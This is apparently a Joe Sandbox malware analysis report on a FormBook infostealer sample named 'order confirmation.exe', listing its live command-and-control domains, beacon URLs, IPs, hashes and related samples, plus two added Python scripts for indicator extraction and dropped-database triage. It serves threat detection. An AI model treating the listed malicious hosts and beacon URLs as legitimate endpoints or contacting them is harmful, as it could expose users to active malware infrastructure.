www.5tuohbpzyj9.buzz | 156.232.181.155 | true | false | (none) | high
www.canadavinreport.site | 185.27.134.206 | true | false | (none) | high
phoenix88.sbs | 88.99.61.52 | true | true | (none) | unknown
www.laohub10.net | unknown | unknown | false | (none) | high
www.phoenix88.sbs | unknown | unknown | false | (none) | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.laohub10.net/8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEp | true | Avira URL Cloud: safe | unknown
http://www.ana-silverco.shop/eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEp | true | Avira URL Cloud: safe | unknown
http://www.5tuohbpzyj9.buzz/abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp | true | Avira URL Cloud: malware | unknown
http://www.phoenix88.sbs/ogj2/ | true | Avira URL Cloud: safe | unknown
http://www.ana-silverco.shop/eaqq/ | true | Avira URL Cloud: safe | unknown
http://www.phoenix88.sbs/ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp | true | Avira URL Cloud: safe | unknown
http://www.5tuohbpzyj9.buzz/abgi/ | true | Avira URL Cloud: malware | unknown
http://www.canadavinreport.site/4d2l/ | true | Avira URL Cloud: malware | unknown
http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w== | true | Avira URL Cloud: malware | unknown
URLs found in memory or binary data

Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://duckduckgo.com/chrome_newtab | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://duckduckgo.com/ac/?q= | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://tempuri.org/kviskotekaDbDataSet.xsdcIgra | order confirmation.exe | false | (none) | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5 | SearchProtocolHost.exe, 00000009.00000002.2823206675.0000000004218000.00000004.10000000.00040000.00000000.sdmp; SearchProtocolHost.exe, 00000009.00000002.2825358139.00000000062E0000.00000004.00000800.00020000.00000000.sdmp; XDBtzWJieMe.exe, 0000000A.00000002.2822111339.0000000003188000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.ecosia.org/newtab/ | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/ps | SearchProtocolHost.exe, 00000009.00000002.2823206675.00000000043AA000.00000004.10000000.00040000.00000000.sdmp; XDBtzWJieMe.exe, 0000000A.00000002.2822111339.000000000331A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://www.ana-silverco.shop | XDBtzWJieMe.exe, 0000000A.00000002.2823935651.0000000004F06000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
27.124.4.246 | r0lqcud7.nbnnn.xyz | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | false
156.232.181.155 | www.5tuohbpzyj9.buzz | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | false
88.99.61.52 | phoenix88.sbs | Germany | 24940 | HETZNER-ASDE | true
185.27.134.206 | www.canadavinreport.site | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false
104.21.90.137 | www.ana-silverco.shop | United States | 13335 | CLOUDFLARENETUS | false
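The contacted URLs above all have the same shape: a four-character path token per host (/ogj2/, /8s5b/, /eaqq/, /abgi/, /4d2l/), a KX parameter whose value differs per host, and a 2VqtG parameter whose value, K0rLevU0Wh5tIJEp, is identical on every host. The script below is an added example, not part of the Joe Sandbox report: it takes the URLs and the domain-to-IP table from this report, extracts the indicator set (hosts, path tokens, resolved IPs, the invariant query parameter) and uses the invariant parameter to recognise a beacon to a host that is not yet on the list. Generalising that shape beyond the URLs in this report is an assumption, as is the fallback that resolves www.phoenix88.sbs through the phoenix88.sbs entry.

```python
"""Indicator extraction from the C2 URLs in this report.

Added example, not part of the Joe Sandbox report. REPORT_URLS and HOST_IPS
are copied from the report's URL and DNS tables. The beacon shape used by
matches_beacon() (a four-character path token plus a query parameter whose
value is identical on every host) is inferred from these URLs only; treating
it as a general rule is an assumption.
"""
import re
from urllib.parse import urlsplit

REPORT_URLS = [
    "http://www.phoenix88.sbs/ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp",
    "http://www.laohub10.net/8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEp",
    "http://www.ana-silverco.shop/eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEp",
    "http://www.5tuohbpzyj9.buzz/abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp",
    "http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w==",
    "http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/ps",
]

# From the report's DNS table; www.phoenix88.sbs and www.laohub10.net did not resolve.
HOST_IPS = {
    "www.ana-silverco.shop": "104.21.90.137",
    "r0lqcud7.nbnnn.xyz": "27.124.4.246",
    "www.5tuohbpzyj9.buzz": "156.232.181.155",
    "www.canadavinreport.site": "185.27.134.206",
    "phoenix88.sbs": "88.99.61.52",
}

PATH_TOKEN = re.compile(r"^/([a-z0-9]{4})/$")


def parse_query(query):
    """Split the query by hand: parse_qs would turn the '+' inside the
    base64-like KX value into spaces and corrupt the indicator."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def beacon(url):
    """Host, path token (None unless the path is exactly /xxxx/) and raw query parameters."""
    parts = urlsplit(url)
    match = PATH_TOKEN.match(parts.path)
    return {"host": parts.hostname, "token": match.group(1) if match else None,
            "params": parse_query(parts.query)}


def ip_for(host):
    """DNS-table lookup; falls back to the bare domain for www. hosts (assumption)."""
    bare = host[4:] if host.startswith("www.") else host
    return HOST_IPS.get(host) or HOST_IPS.get(bare)


def extract_iocs(urls):
    """Hosts, path tokens, resolved IPs and the query parameters whose value never changes."""
    records = [beacon(u) for u in urls]
    tokenised = [r for r in records if r["token"]]
    constant = {}
    for key in set().union(*(r["params"] for r in tokenised)):
        values = {r["params"].get(key) for r in tokenised}
        if len(values) == 1 and None not in values:
            constant[key] = values.pop()
    hosts = sorted({r["host"] for r in records})
    return {"hosts": hosts,
            "tokens": sorted(r["token"] for r in tokenised),
            "constant_params": constant,
            "ips": sorted({ip for ip in map(ip_for, hosts) if ip})}


def matches_beacon(url, iocs):
    """True for a known host, or for an unknown host whose URL has the beacon shape."""
    b = beacon(url)
    if b["host"] in iocs["hosts"]:
        return True
    if b["token"] is None or not iocs["constant_params"]:
        return False
    return all(b["params"].get(k) == v for k, v in iocs["constant_params"].items())


if __name__ == "__main__":
    for key, value in extract_iocs(REPORT_URLS).items():
        print(f"{key}: {value}")
```

The invariant 2VqtG value is the most durable pivot here: hosts and path tokens are per-campaign disposable, while a parameter shared across all five hosts is what a proxy or IDS rule can key on. One caveat on the phoenix88.sbs entries: /cgi-sys/suspendedpage.cgi is the page cPanel serves for a suspended hosting account, so the "safe" verdict on that URL describes the provider's placeholder and says nothing about /ogj2/ on the same host.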
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1575107
                                                  Start date and time:2024-12-14 13:48:14 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 9m 29s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:order confirmation.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@9/2@7/5
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 91%
                                                  • Number of executed functions: 107
                                                  • Number of non-executed functions: 283
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 20.12.23.50, 13.107.246.63
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time; the report may be missing disassembly code information
                                                  • VT rate limit hit for: order confirmation.exe
Time | Type | Description
07:49:33 | API Interceptor | 1x Sleep call for process: order confirmation.exe modified
07:50:47 | API Interceptor | 1170680x Sleep call for process: SearchProtocolHost.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
27.124.4.246 | PO 4110007694.exe | malicious | FormBook | www.laohub10.net/sgdd/
27.124.4.246 | Latest advice payment.exe | malicious | FormBook | www.laohub10.net/sgdd/
27.124.4.246 | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | www.laohub10.net/36be/
27.124.4.246 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.laohub10.net/sgdd/
27.124.4.246 | purchase Order.exe | malicious | FormBook | www.laohub10.net/sgdd/
27.124.4.246 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.laohub10.net/sgdd/
156.232.181.155 | UPDATED CONTRACT.exe | malicious | FormBook | www.5tuohbpzyj9.buzz/abgi/
156.232.181.155 | quotation.exe | malicious | FormBook | www.5tuohbpzyj9.buzz/abgi/
156.232.181.155 | specifications.exe | malicious | FormBook, PureLog Stealer | www.5tuohbpzyj9.buzz/abgi/
156.232.181.155 | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | www.5tuohbpzyj9.buzz/abgi/
156.232.181.155 | PO-DC13112024_pdf.vbs | malicious | Unknown | www.5tuohbpzyj9.buzz/c6yl/
88.99.61.52 | UPDATED CONTRACT.exe | malicious | FormBook | www.phoenix88.sbs/ogj2/
88.99.61.52 | quotation.exe | malicious | FormBook | www.phoenix88.sbs/ogj2/
88.99.61.52 | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | www.phoenix88.sbs/ogj2/
185.27.134.206 | UPDATED CONTRACT.exe | malicious | FormBook | www.canadavinreport.site/4d2l/
185.27.134.206 | quotation.exe | malicious | FormBook | www.canadavinreport.site/4d2l/
185.27.134.206 | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | www.canadavinreport.site/g3h7/
185.27.134.206 | Order MEI PO IM202411484.exe | malicious | FormBook | www.canadavinreport.site/vvzz/
185.27.134.206 | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | www.canadavinreport.site/g3h7/
185.27.134.206 | specifications.exe | malicious | FormBook, PureLog Stealer | www.canadavinreport.site/4d2l/
185.27.134.206 | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | www.canadavinreport.site/4d2l/
185.27.134.206 | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | www.canadavinreport.site/cvhb/
185.27.134.206 | IETC-24017.exe | malicious | FormBook, PureLog Stealer | www.canadavinreport.site/vvzz/
185.27.134.206 | Quotation.exe | malicious | FormBook | www.canadavinreport.site/cvhb/
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
r0lqcud7.nbnnn.xyz | UPDATED CONTRACT.exe | malicious | FormBook | 23.225.159.42
r0lqcud7.nbnnn.xyz | PO 4110007694.exe | malicious | FormBook | 27.124.4.246
r0lqcud7.nbnnn.xyz | Latest advice payment.exe | malicious | FormBook | 27.124.4.246
r0lqcud7.nbnnn.xyz | Document_084462.scr.exe | malicious | FormBook, GuLoader | 23.225.159.42
r0lqcud7.nbnnn.xyz | quotation.exe | malicious | FormBook | 27.124.4.246
r0lqcud7.nbnnn.xyz | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 23.225.159.42
r0lqcud7.nbnnn.xyz | Proforma invoice - Arancia NZ.exe | malicious | FormBook | 202.79.161.151
r0lqcud7.nbnnn.xyz | lKvXJ7VVCK.exe | malicious | FormBook | 23.225.159.42
r0lqcud7.nbnnn.xyz | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | 27.124.4.246
r0lqcud7.nbnnn.xyz | specifications.exe | malicious | FormBook, PureLog Stealer | 23.225.159.42
www.5tuohbpzyj9.buzz | UPDATED CONTRACT.exe | malicious | FormBook | 156.232.181.155
www.5tuohbpzyj9.buzz | quotation.exe | malicious | FormBook | 156.232.181.155
www.5tuohbpzyj9.buzz | specifications.exe | malicious | FormBook, PureLog Stealer | 156.232.181.155
www.5tuohbpzyj9.buzz | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 156.232.181.155
www.5tuohbpzyj9.buzz | PO-DC13112024_pdf.vbs | malicious | Unknown | 156.232.181.155
www.canadavinreport.site | UPDATED CONTRACT.exe | malicious | FormBook | 185.27.134.206
www.canadavinreport.site | quotation.exe | malicious | FormBook | 185.27.134.206
www.canadavinreport.site | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 185.27.134.206
www.canadavinreport.site | Order MEI PO IM202411484.exe | malicious | FormBook | 185.27.134.206
www.canadavinreport.site | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | 185.27.134.206
www.canadavinreport.site | specifications.exe | malicious | FormBook, PureLog Stealer | 185.27.134.206
www.canadavinreport.site | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 185.27.134.206
www.canadavinreport.site | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | 185.27.134.206
www.canadavinreport.site | IETC-24017.exe | malicious | FormBook, PureLog Stealer | 185.27.134.206
www.canadavinreport.site | Quotation.exe | malicious | FormBook | 185.27.134.206
www.ana-silverco.shop | DHL_734825510.exe | malicious | FormBook | 104.21.90.137
www.ana-silverco.shop | UPDATED CONTRACT.exe | malicious | FormBook | 172.67.156.195
www.ana-silverco.shop | SW_5724.exe | malicious | FormBook | 172.67.156.195
www.ana-silverco.shop | quotation.exe | malicious | FormBook | 104.21.90.137
www.ana-silverco.shop | specifications.exe | malicious | FormBook, PureLog Stealer | 104.21.90.137
www.ana-silverco.shop | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 104.21.90.137
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
BCPL-SGBGPNETGlobalASNSG | L4rN4tX0aH.exe | malicious | FormBook | 137.220.183.235
BCPL-SGBGPNETGlobalASNSG | PO 4110007694.exe | malicious | FormBook | 27.124.4.246
BCPL-SGBGPNETGlobalASNSG | Latest advice payment.exe | malicious | FormBook | 27.124.4.246
BCPL-SGBGPNETGlobalASNSG | 72STaC6BmljfbIQ.exe | malicious | FormBook | 134.122.191.187
BCPL-SGBGPNETGlobalASNSG | quotation.exe | malicious | FormBook | 27.124.4.246
BCPL-SGBGPNETGlobalASNSG | Proforma invoice - Arancia NZ.exe | malicious | FormBook | 202.79.161.151
BCPL-SGBGPNETGlobalASNSG | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | 27.124.4.246
BCPL-SGBGPNETGlobalASNSG | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 202.79.161.151
BCPL-SGBGPNETGlobalASNSG | arm5.elf | malicious | Unknown | 180.215.169.147
BCPL-SGBGPNETGlobalASNSG | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 202.79.161.151
DXTL-HKDXTLTseungKwanOServiceHK | sh4.elf | malicious | Mirai | 156.235.189.159
DXTL-HKDXTLTseungKwanOServiceHK | x86.elf | malicious | Mirai | 156.235.242.44
DXTL-HKDXTLTseungKwanOServiceHK | nshkarm7.elf | malicious | Mirai | 156.235.189.172
DXTL-HKDXTLTseungKwanOServiceHK | hax.x86.elf | malicious | Mirai | 156.235.217.38
DXTL-HKDXTLTseungKwanOServiceHK | hax.mpsl.elf | malicious | Mirai | 122.10.72.123
DXTL-HKDXTLTseungKwanOServiceHK | hax.arm.elf | malicious | Mirai | 156.235.217.25
DXTL-HKDXTLTseungKwanOServiceHK | arm5-20241210-1051.elf | malicious | Mirai | 156.235.189.149
DXTL-HKDXTLTseungKwanOServiceHK | arm7-20241210-1051.elf | malicious | Mirai | 156.235.189.191
DXTL-HKDXTLTseungKwanOServiceHK | arm.elf | malicious | Mirai | 156.235.189.161
DXTL-HKDXTLTseungKwanOServiceHK | Fantazy.x86.elf | malicious | Unknown | 45.203.83.137
HETZNER-ASDE | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 116.203.10.31
HETZNER-ASDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 116.203.10.31
HETZNER-ASDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 116.203.10.31
HETZNER-ASDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 116.203.10.31
HETZNER-ASDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 116.203.10.31
HETZNER-ASDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 116.203.10.31
HETZNER-ASDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 116.203.10.31
HETZNER-ASDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 116.203.10.31
HETZNER-ASDE | file.exe | malicious | Amadey | 116.203.10.31
HETZNER-ASDE | SC_TR11670000_pdf.exe | malicious | FormBook | 144.76.190.39
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\order confirmation.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                  Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1209886597424439
                                                  Encrypted:false
                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
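The File Type line above is the decoding of the 100-byte SQLite 3 file header of the database that the injected SearchProtocolHost.exe wrote. As an added example, not part of the report and not Joe Sandbox code, the following stdlib-only Python decodes those header fields so a dropped database can be triaged offline before anything opens it. The header bytes it parses are constructed here from the values the report lists (page size 2048, change counter 7, 89 pages, schema cookie 0x36, schema format 4, UTF-8, version-valid-for 7, SQLite 3042000); they are not bytes read from the dropped file.

```python
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(data: bytes) -> dict:
    """Decode the 100-byte SQLite 3 file header (field offsets per the SQLite file-format spec)."""
    if len(data) < 100 or data[:16] != SQLITE_MAGIC:
        raise ValueError("not an SQLite 3 database")
    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:  # the value 1 encodes a 65536-byte page
        page_size = 65536
    # nine big-endian u32 fields occupy offsets 24..59
    (change_counter, db_pages, _freelist_trunk, _freelist_count, schema_cookie,
     schema_format, _cache_size, _largest_root, text_encoding) = struct.unpack_from(">9I", data, 24)
    version_valid_for, sqlite_version = struct.unpack_from(">2I", data, 92)
    major, rest = divmod(sqlite_version, 1_000_000)
    minor, patch = divmod(rest, 1_000)
    return {
        "page_size": page_size,
        "change_counter": change_counter,
        "db_pages": db_pages,
        # the in-header page count is only authoritative when these two counters agree
        "db_pages_valid": version_valid_for == change_counter,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "encoding": TEXT_ENCODINGS.get(text_encoding, f"unknown({text_encoding})"),
        "sqlite_version": f"{major}.{minor}.{patch}",
    }


def triage_dropped_db(data: bytes, size_on_disk: int) -> dict:
    """Header decode plus the one consistency check worth doing on a copied database."""
    info = parse_sqlite_header(data)
    info["expected_size"] = info["page_size"] * info["db_pages"]
    # a copy whose on-disk size disagrees with a valid in-header page count was padded or truncated
    info["size_mismatch"] = info["db_pages_valid"] and info["expected_size"] != size_on_disk
    return info


def build_constructed_header() -> bytes:
    """CONSTRUCTED sample: a header carrying the field values the report lists, not bytes from the sample."""
    hdr = bytearray(100)
    hdr[:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 2048)          # page size
    hdr[18:24] = bytes([1, 1, 0, 64, 32, 32])      # write/read version, reserved bytes, payload fractions
    # change counter 7, 89 pages, no freelist, schema cookie 0x36, schema format 4, UTF-8 (1)
    struct.pack_into(">9I", hdr, 24, 7, 89, 0, 0, 0x36, 4, 0, 0, 1)
    struct.pack_into(">2I", hdr, 92, 7, 3042000)   # version-valid-for, SQLITE_VERSION_NUMBER (3.42.0)
    return bytes(hdr)


CONSTRUCTED_HEADER = build_constructed_header()
DROPPED_FILE_SIZE = 196608  # the size the report gives for the dropped database

if __name__ == "__main__":
    for key, value in triage_dropped_db(CONSTRUCTED_HEADER, DROPPED_FILE_SIZE).items():
        print(f"{key}: {value}")
```

On the report's values the check fires: 89 pages of 2048 bytes is 182272 bytes, while the dropped copy is 196608 bytes, seven pages more than the header claims, which is the kind of discrepancy to note when the file is a stealer's copy of a browser database rather than the live database.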
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.717628741116791
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:order confirmation.exe
                                                  File size:835'584 bytes
                                                  MD5:8d4459233467bbcf973541c6b17091d7
                                                  SHA1:e1a6e0be6aa2e7aa77c9f5f3c394d62c749c2b06
                                                  SHA256:1bd11bb8886ef9aaaa8a59425f2fce8517a476dcb328751f8c39512cf719f2da
                                                  SHA512:07399bbe3fdb7419a2e31895ecd758e69745076eaaf020cb684d48f36c0abe51a550ec315e76c749b20224aab5886a30f82239e0abbbd2842a9431df38176d77
                                                  SSDEEP:12288:5C25usx+XtKNOWVJcKTNv4qMqHnDdtbW9DZhxprNSvwwJWak:rxN1VJHNAqMqHbWZhHOwwEa
